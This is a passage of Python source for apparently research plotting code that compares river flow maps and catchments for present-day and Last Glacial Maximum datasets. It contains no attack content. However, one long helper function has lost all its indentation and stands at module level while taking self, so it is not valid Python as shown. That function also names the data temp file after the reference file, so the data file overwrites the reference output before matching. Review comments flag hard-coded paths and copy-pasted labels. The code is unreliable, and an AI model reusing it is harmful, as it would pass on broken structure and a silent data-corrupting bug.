                                              rotate_ref=False,
                                              lsmask_has_same_orientation_as_ref=False)
    def ICE5G_data_ALG4_true_sinks_21k_And_ICE5G_data_ALG4_true_sinks_0k_FlowMap_comparison(self):
        """Two-colour comparison of ICE5G ALG4 flow maps at 21k (reference) vs 0k (data) on the 10 minute grid."""
        ref_filename=os.path.join(self.flow_maps_data_directory,
                                  'flowmap_ICE5G_data_ALG4_sinkless_21k_20160603_132009.nc')
        data_filename=os.path.join(self.flow_maps_data_directory,
                                   "flowmap_ICE5G_data_ALG4_sinkless_0k_20160603_112512.nc")
        lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                     "ls_mask_connected_ICE5G_data_ALG4_sinkless_21k_20160603_132009.nc")
        self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
                                              data_filename=data_filename,
                                              lsmask_filename=lsmask_filename,
                                              grid_type='LatLong10min',
                                              minflowcutoff=75,
                                              flip_data=True,
                                              rotate_data=True,
                                              flip_ref=True,
                                              rotate_ref=True)
    def ICE5G_data_all_points_0k_alg4_two_colour(self):
        """Two-colour flow map of the ICE5G ALG4 sinkless present-day (0k) data."""
        filename=os.path.join(self.flow_maps_data_directory,
                              'flowmap_ICE5G_data_ALG4_sinkless_0k_20160603_112512.nc')
        lsmask_filename = os.path.join(self.ls_masks_data_directory,'generated',
                                       'ls_mask_ICE5G_data_ALG4_sinkless_0k_20160603_112512.nc')
        self.FlowMapTwoColourPlotHelper(filename,lsmask_filename=lsmask_filename,
                                        grid_type='LatLong10min',
                                        minflowcutoff=250,flip_data=True,
                                        flip_mask=True)
    def ICE5G_data_all_points_21k_alg4_two_colour(self):
        """Two-colour flow map of the ICE5G ALG4 sinkless LGM (21k) data."""
        filename=os.path.join(self.flow_maps_data_directory,
                              'flowmap_ICE5G_data_ALG4_sinkless_21k_20160603_132009.nc')
        lsmask_filename = os.path.join(self.ls_masks_data_directory,'generated',
                                       'ls_mask_ICE5G_data_ALG4_sinkless_21k_20160603_132009.nc')
        self.FlowMapTwoColourPlotHelper(filename,lsmask_filename=lsmask_filename,
                                        grid_type='LatLong10min',
                                        minflowcutoff=250,flip_data=True,
                                        flip_mask=True)
    def ICE5G_data_all_points_0k_alg4(self):
        """Simple flow map of the ICE5G ALG4 sinkless present-day data."""
        filename=os.path.join(self.flow_maps_data_directory,
                              'flowmap_ICE5G_data_ALG4_sinkless_0k_20160603_112520.nc')
        self.SimpleFlowMapPlotHelper(filename,'LatLong10min')
    def ICE5G_data_all_points_0k_no_sink_filling(self):
        """Simple flow map of the ICE5G present-day data without sink filling."""
        filename=os.path.join(self.flow_maps_data_directory,
                              'flowmap_ICE5G_data_all_points_0k_20160229_133433.nc')
        self.SimpleFlowMapPlotHelper(filename,'LatLong10min',log_max=3.0)
    def Ten_Minute_Data_from_Virna_data_ALG4_corr_orog_downscaled_lsmask_no_sinks_21k_vs_0k_FlowMap_comparison(self):
        """Two-colour comparison of Virna's ten-minute data: present day (reference) vs LGM (data)."""
        ref_filename=os.path.join(self.flow_maps_data_directory,
                                  "flowmap_ten_minute_data_from_virna_0k_ALG4_sinkless"
                                  "_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170123"
                                  "_165707_upscaled_updated.nc")
        data_filename=os.path.join(self.flow_maps_data_directory,
                                   "flowmap_ten_minute_data_from_virna_lgm_ALG4_sinkless"
                                   "_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170127"
                                   "_163957_upscaled_updated.nc")
        lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                     "ls_mask_ten_minute_data_from_virna_lgm_"
                                     "ALG4_sinkless_no_true_sinks_oceans_lsmask"
                                     "_plus_upscale_rdirs_20170127_163957_HD_transf.nc")
        self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
                                              data_filename=data_filename,
                                              lsmask_filename=lsmask_filename,
                                              grid_type='HD',
                                              minflowcutoff=35,
                                              flip_data=False,
                                              rotate_data=True,
                                              flip_ref=False,
                                              rotate_ref=True,
                                              lsmask_has_same_orientation_as_ref=False,
                                              invert_ls_mask=True,
                                              first_datasource_name="Present day",
                                              second_datasource_name="LGM")
class FlowMapPlotsWithCatchments(FlowMapPlots):
    """Flow map plots with selected catchments areas overlaid.

    Extends FlowMapPlots with the additional data directories needed to
    overlay catchments: catchment maps, river directions, river-mouth
    outflows, plus lists of manual catchment/outflow modifications and
    additional matches.
    """

    # Subdirectory names (relative to hd_data_path) for the additional inputs
    catchments_path_extension = 'catchmentmaps'
    rdirs_path_extension = 'rdirs'
    rmouth_outflow_path_extension = 'rmouthflow'
    catchment_and_outflows_mods_list_extension = 'catchmods'
    additional_matches_list_extension = 'addmatches'
    additional_truesink_matches_list_extension = 'addmatches_truesinks'
    orog_path_extension = 'orographys'
    def __init__(self,save,color_palette_to_use='default'):
        """Class constructor.

        Arguments:
        save: bool; whether plots should be saved (passed to the base class)
        color_palette_to_use: str; name of the color palette to use
        """
        super(FlowMapPlotsWithCatchments,self).__init__(save,color_palette_to_use)
        self.catchments_data_directory = os.path.join(self.hd_data_path,self.catchments_path_extension)
        self.rdirs_data_directory = os.path.join(self.hd_data_path,self.rdirs_path_extension)
        self.rmouth_outflow_data_directory = os.path.join(self.hd_data_path,self.rmouth_outflow_path_extension)
        # Timestamped label used to tag temporary files so concurrent runs
        # don't clash
        self.temp_label = 'temp_' + datetime.datetime.now().strftime("%Y%m%d_%H%M%S%f") + "_"
        self.additional_matches_list_directory = os.path.join(self.hd_data_path,
                                                              self.additional_matches_list_extension)
        self.additional_truesink_matches_list_directory = os.path.join(self.additional_matches_list_directory,
                                                                       self.additional_truesink_matches_list_extension)
        self.catchment_and_outflows_mods_list_directory = os.path.join(self.hd_data_path,
                                                                       self.catchment_and_outflows_mods_list_extension)
        self.orog_data_directory = os.path.join(self.hd_data_path,self.orog_path_extension)
def FlowMapTwoColourComparisonWithCatchmentsHelper(self,ref_flowmap_filename,data_flowmap_filename,
ref_catchment_filename,data_catchment_filename,
ref_rdirs_filename,data_rdirs_filename,
reference_rmouth_outflows_filename,
data_rmouth_outflows_filename,
lsmask_filename=None,minflowcutoff=100,flip_data=False,
rotate_data=False,flip_ref=False,rotate_ref=False,
lsmask_has_same_orientation_as_ref=True,
flip_lsmask=False,rotate_lsmask=False,
invert_ls_mask=False,matching_parameter_set='default',
rivers_to_plot=None,
rivers_to_plot_alt_color=None,
rivers_to_plot_secondary_alt_color=None,
use_single_color_for_discrepancies=True,
use_only_one_color_for_flowmap=False,
additional_matches_list_filename=None,
additional_truesink_matches_list_filename=None,
catchment_and_outflows_mods_list_filename=None,
first_datasource_name="Reference",
second_datasource_name="Data",use_title=True,
remove_antartica=False,
difference_in_catchment_label="Discrepancy",
glacier_mask_filename=None,
extra_lsmask_filename=None,
fig_size=(12,5),
grid_type='HD',
glacier_mask_grid_type='LatLong10min',
glacier_mask_grid_kwargs={},
flip_glacier_mask=False,
rotate_glacier_mask=False,
**grid_kwargs):
"""Help compare two two-colour flow maps"""
if (rivers_to_plot_secondary_alt_color is not None):
if (rivers_to_plot is None) or (rivers_to_plot_alt_color is None):
raise RuntimeError("Invalid options - Secondary alternative color set when primary and/or"
"secondary colors unused")
else:
rivers_to_plot_alt_color.extend(rivers_to_plot_secondary_alt_color)
else:
rivers_to_plot_secondary_alt_color = []
flowmap_grid=grid.makeGrid(grid_type)
ref_flowmaps_filepath = os.path.join(self.flow_maps_data_directory,ref_flowmap_filename)
data_flowmaps_filepath = os.path.join(self.flow_maps_data_directory,data_flowmap_filename)
ref_catchment_filepath = os.path.join(self.catchments_data_directory,
ref_catchment_filename)
data_catchment_filepath = os.path.join(self.catchments_data_directory,
data_catchment_filename)
flowmap_ref_field = iodriver.load_field(ref_flowmaps_filepath,
file_type=iodriver.get_file_extension(ref_flowmaps_filepath),
field_type='Generic',
grid_type=grid_type,**grid_kwargs)
flowmap_data_field = iodriver.load_field(data_flowmaps_filepath,
file_type=iodriver.get_file_extension(data_flowmaps_filepath),
field_type='Generic',
grid_type=grid_type,**grid_kwargs)
data_catchment_field = iodriver.load_field(data_catchment_filepath,
file_type=iodriver.get_file_extension(data_catchment_filepath),
field_type='Generic',
grid_type=grid_type,**grid_kwargs)
ref_catchment_field = iodriver.load_field(ref_catchment_filepath,
file_type=iodriver.get_file_extension(ref_catchment_filepath),
field_type='Generic',
grid_type=grid_type,**grid_kwargs)
if data_rdirs_filename:
data_rdirs_filepath = os.path.join(self.rdirs_data_directory,
data_rdirs_filename)
ref_rdirs_filepath = os.path.join(self.rdirs_data_directory,ref_rdirs_filename)
if data_rdirs_filename:
data_rdirs_field = iodriver.load_field(data_rdirs_filepath,
file_type=iodriver.get_file_extension(data_rdirs_filepath),
field_type='Generic',
grid_type=grid_type,**grid_kwargs)
else:
data_rdirs_field = None
ref_rdirs_field = iodriver.load_field(ref_rdirs_filepath,
file_type=iodriver.get_file_extension(ref_rdirs_filepath),
field_type='Generic',
grid_type=grid_type,**grid_kwargs)
if lsmask_filename:
lsmask_field = iodriver.load_field(lsmask_filename,
file_type=iodriver.get_file_extension(lsmask_filename),
field_type='Generic', grid_type=grid_type,**grid_kwargs)
if extra_lsmask_filename:
extra_lsmask_field = iodriver.load_field(extra_lsmask_filename,
file_type=iodriver.
get_file_extension(extra_lsmask_filename),
field_type='Generic',
grid_type=grid_type,**grid_kwargs)
if catchment_and_outflows_mods_list_filename:
catchment_and_outflows_mods_list_filepath = os.path.join(self.catchment_and_outflows_mods_list_directory,
catchment_and_outflows_mods_list_filename)
if additional_matches_list_filename:
additional_matches_list_filepath = os.path.join(self.additional_matches_list_directory,
additional_matches_list_filename)
if additional_truesink_matches_list_filename:
additional_truesink_matches_list_filepath = os.path.join(self.additional_truesink_matches_list_directory,
additional_truesink_matches_list_filename)
if glacier_mask_filename:
glacier_mask_field = iodriver.load_field(glacier_mask_filename,
file_type=iodriver.\
get_file_extension(glacier_mask_filename),
fieldname='sftgif',
field_type='Generic',
grid_type=glacier_mask_grid_type,
**glacier_mask_grid_kwargs)
if glacier_mask_grid_type != grid_type:
glacier_mask_field = utilities.upscale_field(glacier_mask_field,
output_grid_type=grid_type,
method="Mode",
output_grid_kwargs=grid_kwargs,
scalenumbers=False)
else:
glacier_mask_field=None
if flip_data:
flowmap_data_field.flip_data_ud()
data_catchment_field.flip_data_ud()
if data_rdirs_filename:
data_rdirs_field.flip_data_ud()
if rotate_data:
flowmap_data_field.rotate_field_by_a_hundred_and_eighty_degrees()
data_catchment_field.rotate_field_by_a_hundred_and_eighty_degrees()
if data_rdirs_filename:
data_rdirs_field.rotate_field_by_a_hundred_and_eighty_degrees()
if flip_ref:
flowmap_ref_field.flip_data_ud()
ref_catchment_field.flip_data_ud()
ref_rdirs_field.flip_data_ud()
if lsmask_filename and lsmask_has_same_orientation_as_ref:
lsmask_field.flip_data_ud()
if rotate_ref:
flowmap_ref_field.rotate_field_by_a_hundred_and_eighty_degrees()
ref_catchment_field.rotate_field_by_a_hundred_and_eighty_degrees()
ref_rdirs_field.rotate_field_by_a_hundred_and_eighty_degrees()
if lsmask_filename and lsmask_has_same_orientation_as_ref:
lsmask_field.rotate_field_by_a_hundred_and_eighty_degrees()
if invert_ls_mask:
lsmask_field.invert_data()
if extra_lsmask_filename:
extra_lsmask_field.invert_data()
if flip_lsmask and not lsmask_has_same_orientation_as_ref:
lsmask_field.flip_data_ud()
if rotate_lsmask and not lsmask_has_same_orientation_as_ref:
lsmask_field.rotate_field_by_a_hundred_and_eighty_degrees()
if glacier_mask_filename:
if flip_glacier_mask:
glacier_mask_field.flip_data_ud()
if rotate_glacier_mask:
glacier_mask_field.rotate_field_by_a_hundred_and_eighty_degrees()
if lsmask_filename:
lsmask = lsmask_field.get_data()
if extra_lsmask_filename:
extra_lsmask = extra_lsmask_field.get_data()
flowmap_ref_field = flowmap_ref_field.get_data()
flowmap_data_field = flowmap_data_field.get_data()
data_catchment_field = data_catchment_field.get_data()
ref_catchment_field = ref_catchment_field.get_data()
if data_rdirs_filename:
data_rdirs_field = data_rdirs_field.get_data()
ref_rdirs_field = ref_rdirs_field.get_data()
if glacier_mask_filename:
glacier_mask_field = glacier_mask_field.get_data()
plt.figure(figsize=fig_size)
ax = plt.subplot(111)
if extra_lsmask_filename:
image_array,extra_lsmask =fmp_pts.\
make_basic_flowmap_comparison_plot(ax,flowmap_ref_field,
flowmap_data_field,
minflowcutoff,
first_datasource_name,
second_datasource_name,
lsmask,
return_image_array_instead_of_plotting=True,
glacier_mask=glacier_mask_field,
second_lsmask = extra_lsmask)
else:
image_array =fmp_pts.\
make_basic_flowmap_comparison_plot(ax,flowmap_ref_field,
flowmap_data_field,
minflowcutoff,
first_datasource_name,
second_datasource_name,
lsmask,
return_image_array_instead_of_plotting=True,
glacier_mask=glacier_mask_field)
temp_file_list = []
if catchment_and_outflows_mods_list_filename:
ref_outflow_field = iodriver.load_field(reference_rmouth_outflows_filename,
file_type=iodriver.\
get_file_extension(reference_rmouth_outflows_filename),
field_type='Generic', grid_type=grid_type,**grid_kwargs)
data_outflow_field = iodriver.load_field(data_rmouth_outflows_filename,
file_type=iodriver.\
get_file_extension(data_rmouth_outflows_filename),
field_type='Generic', grid_type=grid_type,**grid_kwargs)
if flip_data:
data_outflow_field.flip_data_ud()
if rotate_data:
data_outflow_field.rotate_field_by_a_hundred_and_eighty_degrees()
ref_catchment_field, ref_outflow_field, data_catchment_field, data_outflow_field =\
rc_pts.modify_catchments_and_outflows(ref_catchment_field,ref_outflow_field,flowmap_ref_field,
ref_rdirs_field,data_catchment_field,data_outflow_field,
catchment_and_outflows_modifications_list_filename=\
catchment_and_outflows_mods_list_filepath,
grid_type=grid_type)
if flip_data:
data_outflow_field.flip_data_ud()
if rotate_data:
data_outflow_field.rotate_field_by_a_hundred_and_eighty_degrees()
reference_rmouth_outflows_filename=os.path.join(self.scratch_dir,
self.temp_label + os.path.\
basename(reference_rmouth_outflows_filename))
data_rmouth_outflows_filename=os.path.join(self.scratch_dir,
self.temp_label + os.path.\
basename(reference_rmouth_outflows_filename))
temp_file_list.append(reference_rmouth_outflows_filename)
temp_file_list.append(data_rmouth_outflows_filename)
iodriver.write_field(reference_rmouth_outflows_filename,
field=ref_outflow_field,
file_type=iodriver.\
get_file_extension(reference_rmouth_outflows_filename))
iodriver.write_field(data_rmouth_outflows_filename,
field=data_outflow_field,
file_type=iodriver.\
get_file_extension(data_rmouth_outflows_filename))
matchedpairs,_ = mtch_rm.main(reference_rmouth_outflows_filename=\
reference_rmouth_outflows_filename,
data_rmouth_outflows_filename=\
data_rmouth_outflows_filename,
flip_data_field=flip_data,
rotate_data_field=rotate_data,
flip_ref_field=flip_ref,
rotate_ref_field=rotate_ref,
param_set=matching_parameter_set,
grid_type=grid_type,**grid_kwargs)
if additional_matches_list_filename:
additional_matches = mtch_rm.load_additional_manual_matches(additional_matches_list_filepath,
reference_rmouth_outflows_filename,
data_rmouth_outflows_filename,
flip_data_field=flip_data,
rotate_data_field=rotate_data,
grid_type='HD',**grid_kwargs)
matchedpairs.extend(additional_matches)
if additional_truesink_matches_list_filename:
additional_matches = mtch_rm.load_additional_manual_truesink_matches(additional_truesink_matches_list_filepath,
reference_rmouth_outflows_filename,
data_rmouth_outflows_filename,
ref_flowmap_filename,
data_flowmap_filename,
flip_data_rmouth_outflow_field=\
flip_data,
rotate_data_rmouth_outflow_field=\
rotate_data,
flip_data_flowmap_field=\
flip_data,
rotate_data_flowmap_field=\
rotate_data,
grid_type=grid_type,
**grid_kwargs)
matchedpairs.extend(additional_matches)
for pair in matchedpairs:
if pair[0].get_lat() > 310:
continue
alt_color_num = 8
if (rivers_to_plot is not None) and (rivers_to_plot_alt_color is not None):
if ((not (pair[0].get_lat(),pair[0].get_lon()) in rivers_to_plot) and
(not (pair[0].get_lat(),pair[0].get_lon()) in rivers_to_plot_alt_color)):
continue
elif (((pair[0].get_lat(),pair[0].get_lon()) in rivers_to_plot) and
((pair[0].get_lat(),pair[0].get_lon()) in rivers_to_plot_alt_color)):
raise RuntimeError("Cannot plot a catchment in both original and alternative colors - check for duplicate")
elif ((pair[0].get_lat(),pair[0].get_lon()) in rivers_to_plot):
alt_color=False
elif ((pair[0].get_lat(),pair[0].get_lon()) in rivers_to_plot_secondary_alt_color):
alt_color=True
alt_color_num = 9
else:
alt_color=True
elif rivers_to_plot is not None:
alt_color = False
if not (pair[0].get_lat(),pair[0].get_lon()) in rivers_to_plot:
continue
elif rivers_to_plot_alt_color is not None:
alt_color = True
if not (pair[0].get_lat(),pair[0].get_lon()) in rivers_to_plot_alt_color:
continue
else:
alt_color = False
print("Ref Point: " + str(pair[0]) + "Matches: " + str(pair[1]))
image_array = fmp_pts.add_selected_catchment_to_existing_plot(image_array,data_catchment_field,
ref_catchment_field,data_catchment_field,
flowmap_data_field, ref_rdirs_field,
data_rdirs_field, pair=pair,
catchment_grid_changed=False,
use_alt_color=alt_color,
alt_color_num=alt_color_num,
use_single_color_for_discrepancies=\
use_single_color_for_discrepancies,
use_only_one_color_for_flowmap=\
use_only_one_color_for_flowmap,
grid_type=grid_type,
data_original_scale_grid_type=grid_type)
if extra_lsmask_filename:
image_array = fmp_pts.add_extra_flowmap(image_array,extra_lsmask)
if remove_antartica:
image_array = image_array[:320]
fmp_pts.plot_composite_image(ax,image_array,minflowcutoff,first_datasource_name,second_datasource_name,
use_single_color_for_discrepancies,use_only_one_color_for_flowmap,use_title,
colors=self.colors,difference_in_catchment_label=difference_in_catchment_label,
flowmap_grid=flowmap_grid,plot_glaciers=True if glacier_mask_filename else False,
second_ls_mask=True if extra_lsmask_filename else False)
for temp_file in temp_file_list:
if os.path.basename(temp_file).startswith("temp_"):
print("Deleting File: {0}".format(temp_file))
os.remove(temp_file)
    def Upscaled_Rdirs_vs_Corrected_HD_Rdirs_ICE5G_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison(self):
        """Compare upscaled ICE5G 0k river directions against corrected HD directions.

        Plots the flow map derived from ICE5G ALG4 sinkless data (upscaled
        river directions) against the corrected HD reference flow map with
        selected catchments overlaid in three colour groups. The river lists
        below are (lat,lon) index pairs of river mouths on the HD grid --
        they are matched against the mouth coordinates found by the helper.
        """
        ref_filename=os.path.join(self.flow_maps_data_directory,
                                  'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
        data_filename=os.path.join(self.flow_maps_data_directory,
                                   'flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale'
                                   '_rdirs_20161031_113238_updated.nc')
        lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                     "ls_mask_extract_ls_mask_from_corrected_"
                                     "HD_rdirs_20160504_142435.nc")
        corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
                                                             "rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
        upscaled_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
                                                         "rmouthflows_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_rdirs"
                                                         "_20161031_113238_updated.nc")
        self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
                                                            data_flowmap_filename=data_filename,
                                                            ref_catchment_filename=\
                                                            "catchmentmap_corrected_HD_rdirs_"
                                                            "post_processing_20160427_141158.nc",
                                                            data_catchment_filename="catchmentmap_ICE5G_data_ALG4_"
                                                            "sinkless_downscaled_ls_mask_0k_upscale_rdirs_20161031_113238_updated.nc",
                                                            ref_rdirs_filename="rivdir_vs_1_9_data_from_stefan.nc",
                                                            data_rdirs_filename=None,
                                                            reference_rmouth_outflows_filename=\
                                                            corrected_hd_rdirs_rmouthoutflow_file,
                                                            data_rmouth_outflows_filename=\
                                                            upscaled_rdirs_rmouthoutflow_file,
                                                            lsmask_filename=lsmask_filename,
                                                            minflowcutoff=100,flip_data=True,
                                                            rotate_data=True,flip_ref=False,rotate_ref=False,
                                                            lsmask_has_same_orientation_as_ref=False,
                                                            invert_ls_mask=False,
                                                            first_datasource_name="Reference",
                                                            matching_parameter_set='extensive',
                                                            rivers_to_plot=[(117,424),(121,176),(179,260),
                                                                            (160,573),(40,90),(217,432),
                                                                            (104,598),(46,504),(252,638),
                                                                            (32,612),(132,494),(171,371),
                                                                            (50,439),(121,456),(40,682),
                                                                            (88,430)],
                                                            rivers_to_plot_alt_color=[(192,384),(82,223),
                                                                                      (249,244),(117,603),
                                                                                      (35,521),(144,548),
                                                                                      (72,641),(54,29),
                                                                                      (88,457),(62,173),
                                                                                      (91,111),(125,165),
                                                                                      (159,235),(237,392),
                                                                                      (36,660),(51,717),
                                                                                      (33,603),(90,418),
                                                                                      (89,482),(111,380)],
                                                            rivers_to_plot_secondary_alt_color=[(64,175),
                                                                                                (42,468),
                                                                                                (32,577),
                                                                                                (43,508),
                                                                                                (117,130),
                                                                                                (230,427),
                                                                                                (36,631),
                                                                                                (86,436),
                                                                                                (55,174),
                                                                                                (82,113),
                                                                                                (60,416),
                                                                                                (154,388),
                                                                                                (136,536),
                                                                                                (201,286)],
                                                            use_single_color_for_discrepancies=True,
                                                            catchment_and_outflows_mods_list_filename=\
                                                            "catch_and_outflow_mods_ice5g_10min_upscaled_"
                                                            "rdirs_vs_modern_day.txt",
                                                            second_datasource_name="Data",grid_type='HD')
    def compare_present_day_and_lgm_river_directions_with_catchments_virna_data_plus_tarasov_style_orog_corrs_for_both(self):
        """Compare LGM to present using Virna's data plus tarasov style orography corrections for both times"""
        # Reference: present-day (0k) flow map; data: LGM flow map
        ref_filename=os.path.join(self.flow_maps_data_directory,
                                  "flowmap_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans"
                                  "_lsmask_plus_upscale_rdirs_tarasov_orog_corrs_20170422_195301_upscaled_updated.nc")
        data_filename=os.path.join(self.flow_maps_data_directory,
                                   "flowmap_ten_minute_data_from_virna_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask"
                                   "_plus_upscale_rdirs_tarasov_orog_corrs_20170422_195436_upscaled_updated.nc")
        lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                     "ls_mask_ten_minute_data_from_virna_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask"
                                     "_plus_upscale_rdirs_tarasov_orog_corrs_20170422_195436_HD_transf.dat")
        ref_catchment_filename=("catchmentmap_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask"
                                "_plus_upscale_rdirs_tarasov_orog_corrs_20170422_195301_upscaled_updated.nc")
        data_catchment_filename=("catchmentmap_ten_minute_data_from_virna_lgm_ALG4_sinkless_no_true_sinks_oceans_"
                                 "lsmask_plus_upscale_rdirs_tarasov_orog_corrs_20170422_195436_upscaled_updated.nc")
        ref_rdirs_filename=("generated/upscaled/upscaled_rdirs_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_"
                            "sinks_oceans_lsmask_plus_upscale_rdirs_tarasov_orog_corrs_20170422_195301_upscaled_"
                            "updated_transf.dat")
        # NOTE(review): absolute paths below bypass the class data directories
        reference_rmouth_outflows_filename=("/Users/thomasriddick/Documents/data/HDdata/rmouths/rmouthmap_ten_minute_"
                                            "data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale"
                                            "_rdirs_tarasov_orog_corrs_20170422_195301_upscaled_updated.nc")
        data_rmouth_outflows_filename=("/Users/thomasriddick/Documents/data/HDdata/rmouths/rmouthmap_ten_minute_"
                                       "data_from_virna_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale"
                                       "_rdirs_tarasov_orog_corrs_20170422_195436_upscaled_updated.nc")
        # Glacier mask is read from the ICE5G present-day (0k) orography file
        glacier_mask_filename=os.path.join(self.orog_data_directory,"ice5g_v1_2_21_0k_10min.nc")
        self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
                                                            data_flowmap_filename=data_filename,
                                                            ref_catchment_filename=\
                                                            ref_catchment_filename,
                                                            data_catchment_filename=\
                                                            data_catchment_filename,
                                                            ref_rdirs_filename=\
                                                            ref_rdirs_filename,
                                                            data_rdirs_filename=None,
                                                            reference_rmouth_outflows_filename=\
                                                            reference_rmouth_outflows_filename,
                                                            data_rmouth_outflows_filename=\
                                                            data_rmouth_outflows_filename,
                                                            lsmask_filename=lsmask_filename,
                                                            minflowcutoff=100,
                                                            flip_data=False,
                                                            rotate_data=True,
                                                            flip_ref=False,
                                                            rotate_ref=True,
                                                            lsmask_has_same_orientation_as_ref=False,
                                                            invert_ls_mask=True,
                                                            first_datasource_name="Present day",
                                                            second_datasource_name="LGM",
                                                            matching_parameter_set='extensive',
                                                            catchment_and_outflows_mods_list_filename=\
                                                            "catch_and_outflow_mods_lgm_vs_present_day.txt",
                                                            additional_matches_list_filename=\
                                                            "additional_matches_10min_upscaled_lgm_vs_present.txt",
                                                            use_single_color_for_discrepancies=True,
                                                            use_only_one_color_for_flowmap=False,
                                                            use_title=False,remove_antartica=True,
                                                            difference_in_catchment_label="Difference",
                                                            glacier_mask_filename=glacier_mask_filename,
                                                            glacier_mask_grid_type='LatLong10min',
                                                            flip_glacier_mask=True,
                                                            rotate_glacier_mask=True,
                                                            grid_type='HD')
    def compare_present_day_river_directions_with_catchments_virna_data_with_vs_without_tarasov_style_orog_corrs(self):
        """Compare present day data with and without tarasov upscaling using virna's data"""
        # Reference: 0k with tarasov orography corrections; data: 0k without
        ref_filename=os.path.join(self.flow_maps_data_directory,
                                  "flowmap_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans"
                                  "_lsmask_plus_upscale_rdirs_tarasov_orog_corrs_20170422_195301_upscaled_updated.nc")
        data_filename=os.path.join(self.flow_maps_data_directory,
                                   "flowmap_ten_minute_data_from_virna_0k_ALG4_sinkless"
                                   "_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170123"
                                   "_165707_upscaled_updated.nc")
        lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                     "ls_mask_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask"
                                     "_plus_upscale_rdirs_tarasov_orog_corrs_20170422_195301_HD_transf.nc")
        ref_catchment_filename=("catchmentmap_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask"
                                "_plus_upscale_rdirs_tarasov_orog_corrs_20170422_195301_upscaled_updated.nc")
        data_catchment_filename=("catchmentmap_ten_minute_data_from_virna_0k_ALG4_sinkless"
                                 "_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170123_165707_upscaled_updated.nc")
        ref_rdirs_filename=("generated/upscaled/upscaled_rdirs_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_"
                            "sinks_oceans_lsmask_plus_upscale_rdirs_tarasov_orog_corrs_20170422_195301_upscaled_"
                            "updated_transf.dat")
        reference_rmouth_outflows_filename=("/Users/thomasriddick/Documents/data/HDdata/rmouths/rmouthmap_ten_minute_"
                                            "data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale"
                                            "_rdirs_tarasov_orog_corrs_20170422_195301_upscaled_updated.nc")
        data_rmouth_outflows_filename=("/Users/thomasriddick/Documents/data/HDdata/rmouths/rmouthmap_ten_"
                                       "minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus"
                                       "_upscale_rdirs_20170123_165707_upscaled_updated.nc")
        glacier_mask_filename=os.path.join(self.orog_data_directory,"ice5g_v1_2_21_0k_10min.nc")
        # NOTE(review): the datasource labels "Present day"/"LGM" and the
        # lgm_vs_present mods/matches lists below look copy-pasted from the
        # LGM comparison -- both datasets here are present day (0k); confirm
        # whether these labels and list files are intentional.
        self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
                                                            data_flowmap_filename=data_filename,
                                                            ref_catchment_filename=\
                                                            ref_catchment_filename,
                                                            data_catchment_filename=\
                                                            data_catchment_filename,
                                                            ref_rdirs_filename=\
                                                            ref_rdirs_filename,
                                                            data_rdirs_filename=None,
                                                            reference_rmouth_outflows_filename=\
                                                            reference_rmouth_outflows_filename,
                                                            data_rmouth_outflows_filename=\
                                                            data_rmouth_outflows_filename,
                                                            lsmask_filename=lsmask_filename,
                                                            minflowcutoff=100,
                                                            flip_data=False,
                                                            rotate_data=True,
                                                            flip_ref=False,
                                                            rotate_ref=True,
                                                            lsmask_has_same_orientation_as_ref=False,
                                                            invert_ls_mask=True,
                                                            first_datasource_name="Present day",
                                                            second_datasource_name="LGM",
                                                            matching_parameter_set='extensive',
                                                            catchment_and_outflows_mods_list_filename=\
                                                            "catch_and_outflow_mods_lgm_vs_present_day.txt",
                                                            additional_matches_list_filename=\
                                                            "additional_matches_10min_upscaled_lgm_vs_present.txt",
                                                            use_single_color_for_discrepancies=True,
                                                            use_only_one_color_for_flowmap=False,
                                                            use_title=False,remove_antartica=True,
                                                            difference_in_catchment_label="Difference",
                                                            glacier_mask_filename=glacier_mask_filename,
                                                            glacier_mask_grid_type='LatLong10min',
                                                            flip_glacier_mask=True,
                                                            rotate_glacier_mask=True,
                                                            grid_type='HD')
    def compare_lgm_river_directions_with_catchments_virna_data_with_vs_without_tarasov_style_orog_corrs(self):
        """Compare lgm data with and without tarasov upscaling using virna's data"""
        # Timestamp identifying the tarasov-corrected LGM dataset generation
        tarasov_upscaled_data_datetime="20170518_193949"
        # Reference: LGM without tarasov corrections; data: LGM with them
        ref_filename=os.path.join(self.flow_maps_data_directory,
                                  "flowmap_ten_minute_data_from_virna_lgm_ALG4_sinkless"
                                  "_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170127"
